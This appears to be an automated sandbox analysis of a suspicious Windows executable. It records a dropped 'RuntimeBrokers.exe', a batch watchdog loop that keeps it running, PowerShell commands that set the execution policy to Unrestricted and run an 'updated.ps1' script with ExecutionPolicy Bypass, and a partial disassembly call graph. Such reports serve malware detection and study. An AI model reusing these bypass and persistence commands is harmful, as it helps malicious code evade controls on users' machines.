                                                          Commandline:"C:\Users\user\Desktop\CnjMEmbChO.exe"
                                                          Imagebase:0x400000
                                                          File size:23'595'283 bytes
                                                          MD5 hash:6B64F2CD11EC2223C9818E0F752C649E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:17:13:15
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:17:13:16
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff649e70000
                                                          File size:875'008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:17:13:16
                                                          Start date:26/12/2024
                                                          Path:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          Imagebase:0x70000
                                                          File size:777'816 bytes
                                                          MD5 hash:30A274E00DA842B09E9763F19777ADED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 4%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:5
                                                          Start time:17:14:26
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:6
                                                          Start time:17:14:26
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff649e70000
                                                          File size:875'008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:17:14:26
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:17:14:26
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff649e70000
                                                          File size:875'008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff649e70000
                                                          File size:875'008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                          Imagebase:0xa0000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:17:14:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                          Imagebase:0xa0000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:17:14:57
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:17:14:57
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:17:14:57
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:17:15:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:17:15:27
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:17:15:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:17:15:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:17:15:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:17:15:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:17:16:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:17:16:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:17:16:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:17:16:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:17:16:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:17:16:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:17:17:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:17:17:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:17:17:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:17:17:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:17:17:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:17:17:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:37
                                                          Start time:17:18:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:17:18:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:17:18:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:17:18:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:17:18:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:42
                                                          Start time:17:18:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:17:19:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:17:19:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:45
                                                          Start time:17:19:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:46
                                                          Start time:17:19:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:47
                                                          Start time:17:19:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr /I "RuntimeBrokers.exe"
                                                          Imagebase:0xf20000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:48
                                                          Start time:17:19:58
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 30 /nobreak
                                                          Imagebase:0xec0000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:49
                                                          Start time:17:20:28
                                                          Start date:26/12/2024
                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                          Imagebase:0xaa0000
                                                          File size:79'360 bytes
                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:17.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:26.9%
                                                            Total number of Nodes:1422
                                                            Total number of Limit Nodes:15
                                                            execution_graph 9093 410e7f 9094 410e9a 9093->9094 9095 410eb5 9094->9095 9097 40f42d 9094->9097 9098 40f445 free 9097->9098 9099 40f437 9097->9099 9100 4024e7 46 API calls 9098->9100 9099->9098 9101 40f456 9099->9101 9100->9101 9101->9095 9089 40e63c 9090 40e5d3 6 API calls 9089->9090 9091 40e644 9090->9091 8243 4024c4 8244 40245a 45 API calls 8243->8244 8245 4024cd 8244->8245 8246 4024d2 8245->8246 8247 4024d3 VirtualAlloc 8245->8247 8248 4096c7 _EH_prolog 8262 4096fa 8248->8262 8249 40971c 8250 409827 8283 40118a 8250->8283 8252 409851 8256 40985e ??2@YAPAXI 8252->8256 8253 40983c 8334 409425 8253->8334 8254 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8254->8262 8258 409878 8256->8258 8257 40969d 8 API calls 8257->8262 8263 409925 ??2@YAPAXI 8258->8263 8264 4098c2 8258->8264 8268 409530 3 API calls 8258->8268 8270 409425 3 API calls 8258->8270 8272 4099a2 8258->8272 8277 409a65 8258->8277 8293 409fb4 8258->8293 8297 408ea4 8258->8297 8340 409c13 ??2@YAPAXI 8258->8340 8342 409f49 8258->8342 8260 40e959 VirtualFree ??3@YAXPAX free free 8260->8262 8262->8249 8262->8250 8262->8254 8262->8257 8262->8260 8327 4095b7 8262->8327 8331 409403 8262->8331 8263->8258 8337 409530 8264->8337 8268->8258 8270->8258 8273 409530 3 API calls 8272->8273 8274 4099c7 8273->8274 8275 409425 3 API calls 8274->8275 8275->8249 8279 409530 3 API calls 8277->8279 8280 409a84 8279->8280 8281 409425 3 API calls 8280->8281 8281->8249 8284 401198 GetDiskFreeSpaceExW 8283->8284 8285 4011ee SendMessageW 8283->8285 8284->8285 8286 4011b0 8284->8286 8291 4011d6 8285->8291 8286->8285 8287 401f9d 19 API calls 8286->8287 8288 4011c9 8287->8288 8289 407717 25 API calls 8288->8289 8290 4011cf 8289->8290 8290->8291 8292 4011e7 8290->8292 8291->8252 8291->8253 8292->8285 8294 409fdd 8293->8294 8346 409dff 8294->8346 8620 40aef3 8297->8620 8300 408ec1 8300->8258 8302 408fd5 8638 408b7c 8302->8638 8303 408f0d ??2@YAPAXI 8312 408ef5 8303->8312 8305 408f31 ??2@YAPAXI 8305->8312 8312->8302 8312->8303 8312->8305 8680 40cdb8 ??2@YAPAXI 8312->8680 8328 4095c6 8327->8328 8330 4095cc 8327->8330 8328->8262 8329 4095e2 _CxxThrowException 8329->8328 8330->8328 8330->8329 8332 40e8e2 4 API calls 8331->8332 8333 40940b 8332->8333 8333->8262 8335 40e8da 3 API calls 8334->8335 8336 409433 8335->8336 8338 408963 3 API calls 8337->8338 8339 40953b 8338->8339 8341 409c45 8340->8341 8341->8258 8345 409f4e 8342->8345 8343 409f75 8343->8258 8344 409cde 110 API calls 8344->8345 8345->8343 8345->8344 8348 409e04 8346->8348 8347 409e3a 8347->8258 8348->8347 8350 409cde 8348->8350 8351 409cf8 8350->8351 8355 401626 8351->8355 8418 40db1f 8351->8418 8352 409d2c 8352->8348 8356 401642 8355->8356 8362 401638 8355->8362 8421 40a62f _EH_prolog 8356->8421 8358 40166f 8489 40eca9 8358->8489 8359 401411 2 API calls 8361 401688 8359->8361 8363 401962 ??3@YAXPAX 8361->8363 8364 40169d 8361->8364 8362->8352 8368 40eca9 VariantClear 8363->8368 8447 401329 8364->8447 8367 4016a8 8451 401454 8367->8451 8368->8362 8371 401362 2 API calls 8372 4016c7 ??3@YAXPAX 8371->8372 8377 4016d9 8372->8377 8404 401928 ??3@YAXPAX 8372->8404 8374 40eca9 VariantClear 8374->8362 8375 4016fa 8376 40eca9 VariantClear 8375->8376 8378 401702 ??3@YAXPAX 8376->8378 8377->8375 8379 401764 8377->8379 8388 401725 8377->8388 8378->8358 8382 4017a2 8379->8382 8383 401789 8379->8383 8380 40eca9 VariantClear 8381 401737 ??3@YAXPAX 8380->8381 8381->8358 8385 4017c4 GetLocalTime SystemTimeToFileTime 8382->8385 8386 4017aa 8382->8386 8384 40eca9 VariantClear 8383->8384 8387 401791 ??3@YAXPAX 8384->8387 8385->8386 8386->8388 8389 4017e1 8386->8389 8390 4017f8 8386->8390 8387->8358 8388->8380 8456 403354 lstrlenW 8389->8456 8480 40301a GetFileAttributesW 8390->8480 8394 401934 GetLastError 8394->8404 8395 401818 ??2@YAPAXI 8397 401824 8395->8397 8396 40192a 8396->8394 8493 40db53 8397->8493 8400 40190f 8403 40eca9 VariantClear 8400->8403 8401 40185f GetLastError 8496 4012f7 8401->8496 8403->8404 8404->8374 8405 401871 8406 403354 86 API calls 8405->8406 8409 40187f 